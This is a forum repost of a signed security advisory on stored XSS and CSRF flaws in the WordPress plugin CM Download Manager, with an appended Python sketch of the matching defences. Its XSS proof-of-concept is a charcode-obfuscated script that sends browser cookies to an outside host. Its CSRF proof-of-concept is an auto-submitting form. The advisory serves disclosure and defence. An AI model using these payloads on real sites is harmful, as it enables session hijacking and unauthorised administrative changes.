Aerosol
Posted December 4, 2014

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Product: WordPress plugin cm-download-manager
Plugin page: [url]https://wordpress.org/plugins/cm-download-manager/[/url]
Vendor: CreativeMindsSolutions [url]http://cminds.com/[/url]
Vulnerability Type: CWE-79: Cross-site scripting
Vulnerable Versions: 2.0.6 and below
Fixed Version: 2.0.7
Solution Status: Fixed by Vendor
Vendor Notification: 2014-11-27
Public Disclosure: 2014-12-02
CVE Reference: N/A. Only assigned for CSRF
Criticality: Low

Vulnerability details:
CM Download Manager plugin for WordPress contains a flaw that allows a stored cross-site scripting (XSS) attack. This flaw exists because the /wp-admin/admin.php script does not validate input to the 'addons_title' POST parameter before returning it to users. This allows an authenticated remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server.

Root cause:
The software incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to authenticated users.

Proof-of-concept:
Insert following code to CM Downloads -> Settings -> "Downloads listing title" field with CSRF attack.

<script>
var foo = String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 110,
101, 119, 32, 73, 109, 97, 103, 101, 40, 41, 46, 115, 114, 99, 61, 34, 104, 116,
116, 112, 58, 47, 47, 98, 117, 103, 115, 46, 102, 105, 47, 99, 111, 111, 107,
105, 101, 46, 112, 104, 112, 63, 105, 100, 61, 34, 43, 100, 111, 99, 117, 109,
101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 60, 47, 115, 99, 114, 105,
112, 116, 62);
document.write(foo);
</script>

- ---------------

Product: WordPress plugin cm-download-manager
Plugin page: [url]https://wordpress.org/plugins/cm-download-manager/[/url]
Vendor: CreativeMindsSolutions [url]http://cminds.com/[/url]
Vulnerability Type: CWE-352: Cross-Site Request Forgery
Vulnerable Versions: 2.0.6 and below
Fixed Version: 2.0.7
Solution Status: Fixed by Vendor
Vendor Notification: 2014-11-27
Public Disclosure: 2014-12-02
CVE Reference: CVE-2014-9129
Criticality: Low

Vulnerability details:
CM Download Manager plugin for WordPress contains a flaw on the CMDM_admin_settings page as HTTP requests to /wp-admin/admin.php do not require multiple steps, explicit confirmation, or a unique token when performing sensitive actions. By tricking authenticated user into following a specially crafted link, a context-dependent attacker can perform a CSRF attack causing the victim to insert and execute arbitrary script code.

Root cause:
The web application does not sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.

Proof-of-concept:

<html>
<body>
<h3>https://example.org/wp-admin/admin.php?page=CMDM_admin_settings</h3>
<form id="f1" method="POST"
action="https://example.com/wp-admin/admin.php?page=CMDM_admin_settings">
<table>
<input type="text" name="addons_title" value="XSS">
</table>
</form>
<script type="text/javascript">
document.getElementById("f1").submit();
</script>
</body>
</html>

Notes:
Other pages and/or parameters are also possibly insecure (not tested). Suggested to do a proper security audit for their software. Vendor did not mention security fix or CVE in ChangeLog even it was discussed several times. References below.

Cross-site scripting:
[url=http://cwe.mitre.org/data/definitions/79.html]CWE - CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (2.8)[/url]
[url]https://scapsync.com/cwe/CWE-79[/url]
[url]https://en.wikipedia.org/wiki/Cross-site_scripting[/url]

Cross-Site Request Forgery:
[url=http://cwe.mitre.org/data/definitions/352.html]CWE - CWE-352: Cross-Site Request Forgery (CSRF) (2.8)[/url]
[url]https://scapsync.com/cwe/CWE-352[/url]
[url]https://en.wikipedia.org/wiki/Cross-site_request_forgery[/url]

- ---
Henri Salo
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlR96QIACgkQXf6hBi6kbk8peQCgtWgwrqs7ahsAw30Ndnu70N7/
l98An1m+MqJ7xJ8+VcPbMxo72i1Xs2oT
=bUVi
-----END PGP SIGNATURE-----
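
A minimal model of the two controls the advisory's root causes point to, as an added example that is not part of the original post or the plugin's code: a per-session token check on the settings POST, and output encoding of the stored title. `addons_title` and `CMDM_admin_settings` come from the advisory; `csrf_token`, the function names, the key and the session value are hypothetical.

```python
import hashlib
import hmac
import html
import secrets

SERVER_KEY = secrets.token_bytes(32)   # per-site secret (constructed for the example)
ACTION = "CMDM_admin_settings"         # settings page named in the advisory
settings = {}                          # stands in for the plugin's stored options


def issue_token(session_id: str) -> str:
    """Token bound to one session and one action; embedded in the settings form."""
    msg = f"{session_id}|{ACTION}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def save_settings(session_id: str, post: dict) -> bool:
    """Reject any POST that does not carry a valid token for this session."""
    supplied = str(post.get("csrf_token", "")).encode()
    expected = issue_token(session_id).encode()
    if not hmac.compare_digest(supplied, expected):
        return False                   # forged cross-site request: nothing is stored
    settings["addons_title"] = str(post.get("addons_title", ""))
    return True


def render_title() -> str:
    """Encode at output so a stored value is shown as text, not parsed as markup."""
    return "<h2>" + html.escape(settings.get("addons_title", ""), quote=True) + "</h2>"


def demo() -> tuple:
    """Replay the advisory's chain against the hardened handler (constructed input)."""
    settings.clear()
    session = "admin-session-1"
    # 1. Auto-submitted cross-site form: carries the field but cannot know the token.
    forged = save_settings(session, {"addons_title": "XSS"})
    stored_after_forged = "addons_title" in settings
    # 2. Same-site form submitted with the token; the value contains markup.
    legit = save_settings(session, {"addons_title": "<script>x</script>",
                                    "csrf_token": issue_token(session)})
    return forged, stored_after_forged, legit, render_title()


if __name__ == "__main__":
    print(demo())
```
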